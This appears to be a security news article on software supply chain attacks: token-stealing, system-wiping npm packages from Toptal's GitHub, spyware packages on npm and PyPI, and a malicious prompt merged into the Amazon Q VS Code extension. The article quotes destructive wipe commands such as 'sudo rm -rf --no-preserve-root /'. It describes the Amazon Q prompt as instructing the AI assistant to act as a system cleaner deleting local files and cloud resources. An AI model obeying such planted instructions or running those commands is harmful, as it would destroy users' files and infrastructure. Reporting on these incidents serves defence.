In the latest example of a software supply chain attack, unknown threat actors gained unauthorized access to Toptal's GitHub organization account. Using this access, they published ten malicious packages to the npm registry.
According to a report by Socket, the malicious packages contained code designed to steal GitHub authentication tokens and destroy victim systems. Additionally, 73 repositories linked to the organization were made public.
The affected packages include the following:
- @toptal/picasso-tailwind
- @toptal/picasso-charts
- @toptal/picasso-shared
- @toptal/picasso-provider
- @toptal/picasso-select
- @toptal/picasso-quote
- @toptal/picasso-forms
- @xene/core
- @toptal/picasso-utils
- @toptal/picasso-typograph
Each Node.js library was embedded with identical malicious payloads placed in their package.json files. These packages were downloaded around 5,000 times before being removed from the repository.
The malicious code was specifically injected into the preinstall and postinstall scripts. Its purpose was to send stolen GitHub authentication tokens to a webhook[.]site endpoint and then erase all files and directories on infected systems without user input. This worked on both Windows and Linux systems using commands such as "rm /s /q" or "sudo rm -rf --no-preserve-root /".
The exact method used to gain access remains unknown. Possible explanations include compromised credentials or an insider with access to Toptal’s GitHub organization. The packages have now been rolled back to secure versions.
This incident was reported alongside another supply chain attack affecting both npm and PyPI repositories. That attack used surveillance tools to infect developers’ machines with malware capable of logging keystrokes, capturing screens and webcam images, collecting system information, and stealing credentials.
According to Socket, the spyware used invisible iframes, browser event listeners, and libraries like pyautogui and pag for screen captures. It also accessed webcams using modules such as pygame.camera.
The stolen data was transmitted through Slack webhooks, Gmail SMTP, AWS Lambda endpoints, and Burp Collaborator subdomains. The affected packages include:
- dpsdatahub (npm) with 5,869 downloads
- nodejs-backpack (npm) with 830 downloads
- m0m0x01d (npm) with 37,847 downloads
- vfunctions (PyPI) with 12,033 downloads
These findings highlight the growing threat of malicious actors exploiting trust in open-source ecosystems to spread malware and spyware, endangering developers and end users alike.
This wave of attacks follows another incident where the Amazon Q extension for Visual Studio Code was compromised. A malicious version included a prompt designed to wipe the user's home directory and delete their AWS resources.
The attacker, using the alias "lkmanka58," submitted a pull request to Amazon's GitHub repository that was merged into the source code. It contained harmful instructions aimed at erasing systems. The change was first discovered by 404 Media.
The command told the AI assistant to behave as a system-cleaning tool, deleting both local files and cloud resources.
The individual behind the attack, who called themselves "ghost," told The Hacker News that they intended to reveal the company's poor security practices. Amazon has since removed the compromised version and released a safe update as version 1.85.0.
In a statement, Amazon confirmed that an unapproved code modification had been attempted in the open-source VSC extension. However, they clarified that no production services or end users were affected.
After identifying the issue, Amazon immediately revoked and replaced compromised credentials, removed the unauthorized code, and issued an updated version of the Amazon Q Developer Extension to the marketplace.
Found this article interesting? Follow us on X(Twitter) ,Threads and FaceBook to read more exclusive content we post.
